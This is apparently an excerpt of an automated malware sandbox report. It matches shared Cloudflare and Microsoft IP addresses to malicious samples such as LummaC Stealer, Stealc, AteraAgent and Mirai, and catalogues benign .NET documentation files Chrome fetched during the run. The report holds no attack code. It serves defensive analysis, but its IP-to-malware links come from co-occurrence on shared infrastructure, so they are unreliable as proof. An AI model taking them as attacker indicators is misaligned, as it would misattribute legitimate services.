                                                                                                                                                                                              property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              registration.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              Db5aU9VNyz.dllGet hashmaliciousStrela StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.161.207
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.10.6
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.0.227
                                                                                                                                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                              2aiDfP0r7h.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.16.230.132
                                                                                                                                                                                              OVtsE8ZkBE.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.16.231.132
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.162.84
                                                                                                                                                                                              zapret.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSlw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                                              file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                              • 20.233.83.145
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              zgp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 104.47.228.166
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                              • 13.97.201.230
                                                                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                              • 21.117.214.202
                                                                                                                                                                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              1138de370e523e824bbca92d049a3777lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              https://clearview-ps.inwise.net/Page_11-21-2024_1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 173.222.162.64
                                                                                                                                                                                              28a2c9bd18a11de089ef85a160da29e4lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              wX7zgpJHJS.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                              • 13.107.246.63
                                                                                                                                                                                              • 23.218.208.109
                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0emDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              ListaItensVistoriaCorpodeBombeirosObrigatorio.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              registration.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              portal.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              Digital.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              file_66efd0132ceed.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              e0#U05ea.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              ReceitaFederal-consulta-yFZMA-45896_v.3_35687.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 104.21.33.116
                                                                                                                                                                                              No context
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):47062
                                                                                                                                                                                              Entropy (8bit):5.016115705165622
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                              MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                              SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                              SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                              SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                              Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                              Malicious:false
